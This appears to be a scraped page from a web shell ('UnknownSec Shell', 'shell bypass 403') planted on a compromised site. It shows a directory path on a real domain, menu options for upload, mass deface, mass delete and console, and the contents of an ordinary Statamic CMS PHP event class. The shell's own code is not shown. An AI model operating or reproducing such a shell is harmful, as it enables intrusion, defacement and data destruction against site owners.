shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Events
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
TermReferencesUpdated.php
<?php namespace Statamic\Events; use Statamic\Contracts\Git\ProvidesCommitMessage; class TermReferencesUpdated extends Event implements ProvidesCommitMessage { public $term; public function __construct($term) { $this->term = $term; } public function commitMessage() { return __('Term references updated', [], config('statamic.git.locale')); } }
© 2026 UnknownSec